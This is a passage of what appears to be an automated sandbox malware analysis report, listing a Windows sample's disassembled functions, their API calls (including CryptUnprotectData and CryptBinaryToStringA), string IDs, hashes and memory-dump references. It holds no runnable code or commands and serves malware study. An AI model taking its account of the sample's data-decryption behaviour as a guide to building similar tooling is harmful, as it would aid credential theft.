                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 7u$Gwg$`o6$u?
                  • API String ID: 0-466346664
                  • Opcode ID: f3eeb88ba88e74b8cdc777ebbc3415caaed6f5efda1582736f0a4e22ffa6d58c
                  • Instruction ID: 18dccb265cc463543bb42cd895f7d3a15fe969b82203dac4886b01a0b2c6361b
                  • Opcode Fuzzy Hash: f3eeb88ba88e74b8cdc777ebbc3415caaed6f5efda1582736f0a4e22ffa6d58c
                  • Instruction Fuzzy Hash: ABB207F3A08214AFE304AE2DEC4577ABBE5EF94320F1A453DEAC4C7744EA3558058796
                  Function 002B8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptBinaryToStringA.CRYPT32(00000000,002A5184,40000001,00000000,00000000,?,002A5184), ref: 002B8EC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptString
                  • String ID:
                  • API String ID: 80407269-0
                  • Opcode ID: 50f04957cf13fadb8b092e91b5ca80abae7faa5a5ea73a837a4ab918e7a33672
                  • Instruction ID: c9964ba725d94703a9fba4e442e9f8223e05418227e5c90968e78e72defbccc4
                  • Opcode Fuzzy Hash: 50f04957cf13fadb8b092e91b5ca80abae7faa5a5ea73a837a4ab918e7a33672
                  • Instruction Fuzzy Hash: CC111570220209BFDB00DF64E884FBB37ADAF89380F109458F9598B251DB75EC61DBA5
                  Function 002B7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00D5F710,00000000,?,002C0E10,00000000,?,00000000,00000000), ref: 002B7A63
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B7A6A
                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00D5F710,00000000,?,002C0E10,00000000,?,00000000,00000000,?), ref: 002B7A7D
                  • wsprintfA.USER32 ref: 002B7AB7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                  • String ID:
                  • API String ID: 3317088062-0
                  • Opcode ID: 012f9fb187d989c9063d5e69dc6f360be6cb3f0bf42b924ea94dc3110384fa7b
                  • Instruction ID: e166ef04e4d771177c67e0ba34f396761f7a8113fde306b39ce2782b5f72cacb
                  • Opcode Fuzzy Hash: 012f9fb187d989c9063d5e69dc6f360be6cb3f0bf42b924ea94dc3110384fa7b
                  • Instruction Fuzzy Hash: 5C118EB1945218EBEB209F54DC89FA9BB78FB44721F1043AAEA0A972C0D7742A50CF51
                  Function 0067A2B7 Relevance: 5.4, Strings: 3, Instructions: 1645COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: MCF$~.wV$u~%
                  • API String ID: 0-2008623073
                  • Opcode ID: 54697eadaddaac7bef49ccf39335abf5c40617422a8ec55fd3c8c7bdd5ddb6ff
                  • Instruction ID: b1c3180aa2631e29f81b8d7cf3849f567b3596ad6dfef8b7dd075fa29e6f066e
                  • Opcode Fuzzy Hash: 54697eadaddaac7bef49ccf39335abf5c40617422a8ec55fd3c8c7bdd5ddb6ff
                  • Instruction Fuzzy Hash: BDB208F360C2109FE7046E29EC8567ABBE9EF94720F1A893DE6C4C7304E67598058797
                  Function 00672020 Relevance: 5.3, Strings: 3, Instructions: 1594COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Dkwg$Mhw?$Ss^W
                  • API String ID: 0-2505466677
                  • Opcode ID: 29e878b6cc771aa8128ada1949eaeeabcc8997a4aa3a37673371096e1a3d0a37
                  • Instruction ID: 0cac108ba7ad5d7413b5b635fbea107b3cd9b1f0c0d44bb54d27bbdf2c045c4f
                  • Opcode Fuzzy Hash: 29e878b6cc771aa8128ada1949eaeeabcc8997a4aa3a37673371096e1a3d0a37
                  • Instruction Fuzzy Hash: 7CB22AF3A082149FE304AE2DDC4567ABBE9EF94720F1A493DEAC4C7740EA3558058797
                  Function 002B3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                  Download Yara Rule
                  APIs
                  • CoCreateInstance.COMBASE(002BE118,00000000,00000001,002BE108,00000000), ref: 002B3758
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 002B37B0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharCreateInstanceMultiWide
                  • String ID:
                  • API String ID: 123533781-0
                  • Opcode ID: 43d185d4f47ee5e809fb9dd2ab5efa4d1bd95ce0cb31abed6b7e2476c613065d
                  • Instruction ID: 4c879e519a5753f9178b8ed97226695af198e2d7d1ef798af2e40aaa08621274
                  • Opcode Fuzzy Hash: 43d185d4f47ee5e809fb9dd2ab5efa4d1bd95ce0cb31abed6b7e2476c613065d
                  • Instruction Fuzzy Hash: 8241F870A50A289FDB24DB58CC94BDBB7B5BB48702F4051D8E608EB2D0D7B1AE85CF51
                  Function 002A9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 002A9B84
                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 002A9BA3
                  • LocalFree.KERNEL32(?), ref: 002A9BD3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$AllocCryptDataFreeUnprotect
                  • String ID:
                  • API String ID: 2068576380-0
                  • Opcode ID: fb014a46ee41fa276b992bd04cd083927e28b1cc1a58ccd1366b786e4d097d53
                  • Instruction ID: a8e49edb6369eb9a119f54b0c4cd4d810cccd1b6cd30456ee4e0224ea708f3db
                  • Opcode Fuzzy Hash: fb014a46ee41fa276b992bd04cd083927e28b1cc1a58ccd1366b786e4d097d53
                  • Instruction Fuzzy Hash: 6C110CB4A00209DFCB04DF94D985AAE77B5FF89304F104568E8159B350D770AE51CF61
                  Function 00676EDC Relevance: 4.1, Strings: 2, Instructions: 1554COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Lap$_Ww
                  • API String ID: 0-1206012690
                  • Opcode ID: a5f84a87de458cd3ecbd753822e5690e1a3265685cd28a3ac3554c0c8e34ea33
                  • Instruction ID: cdbcae2fa511dcda5c2a72cf1f21d0352a7cb7d05928d816299c3ba64f2276cb
                  • Opcode Fuzzy Hash: a5f84a87de458cd3ecbd753822e5690e1a3265685cd28a3ac3554c0c8e34ea33
                  • Instruction Fuzzy Hash: DCA207F3A0C2109FE7146E2DEC8567ABBE9EF94720F1A453DEAC4C7740E63598018796
                  Function 00680FBD Relevance: 2.9, Strings: 1, Instructions: 1621COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: KoS
                  • API String ID: 0-740852584
                  • Opcode ID: 7d39ed1b3b951c2a34cc3213eb9d7928f5e1d699df91ac51dc1e6d88fcdd6eb5
                  • Instruction ID: 489b2a754ab9e8c5ac4551a3ea2d128a01194c5bd0fb6e2f0b23b5ee65d2e00e
                  • Opcode Fuzzy Hash: 7d39ed1b3b951c2a34cc3213eb9d7928f5e1d699df91ac51dc1e6d88fcdd6eb5
                  • Instruction Fuzzy Hash: FCB2F6F360C2049FE304AE2DEC8577ABBE9EF94320F1A463DEAC5C3744E53598058696
                  Function 005E3696 Relevance: 2.6, Strings: 2, Instructions: 147COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: :;+$zR|;
                  • API String ID: 0-401658067
                  • Opcode ID: fa63f3969900b4630c459ba64c8d416f74fa637058a1679792aa83d582bd2f2b
                  • Instruction ID: a9814f03ebb6453485051dc1d4509529402536bace5862a0eaaff3c293206d9d
                  • Opcode Fuzzy Hash: fa63f3969900b4630c459ba64c8d416f74fa637058a1679792aa83d582bd2f2b
                  • Instruction Fuzzy Hash: D94136B39083108FE3146F28EC8536AFBE5FB94720F1B4A3CDAC453744EA7959448782
                  Function 007874E0 Relevance: 1.6, Strings: 1, Instructions: 349COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: .[
                  • API String ID: 0-2452726844
                  • Opcode ID: 505df7aecf43b210f0a8ae9a2b7a6a8b759221d65ba8f477b50541f4ec52c2e7
                  • Instruction ID: 9dff3960147e115340e09225794bf2d8c4742b852e8124d5f4c90e085c40b218
                  • Opcode Fuzzy Hash: 505df7aecf43b210f0a8ae9a2b7a6a8b759221d65ba8f477b50541f4ec52c2e7
                  • Instruction Fuzzy Hash: B1B178F3A082109BE7049E2CEDC576AB7E5EF94320F2A413DD9C5D7784E67A9805C781
                  Function 00546A19 Relevance: 1.5, Strings: 1, Instructions: 250COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ]0}
                  • API String ID: 0-3200878567
                  • Opcode ID: 749ea41581d02a3cff68ade3d6b12f4118a3093df758b91d6ad669b0afa9c50a
                  • Instruction ID: 67a47bb84d68aad860cf97e1d20c3f85d09c27c8336f6068ab22388828a75f43
                  • Opcode Fuzzy Hash: 749ea41581d02a3cff68ade3d6b12f4118a3093df758b91d6ad669b0afa9c50a
                  • Instruction Fuzzy Hash: 978155F3E087145BF3046E2DDD9836ABBD6EBC4320F2B863DDAC857784D93858058696
                  Function 0057F3B2 Relevance: 1.5, Strings: 1, Instructions: 233COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
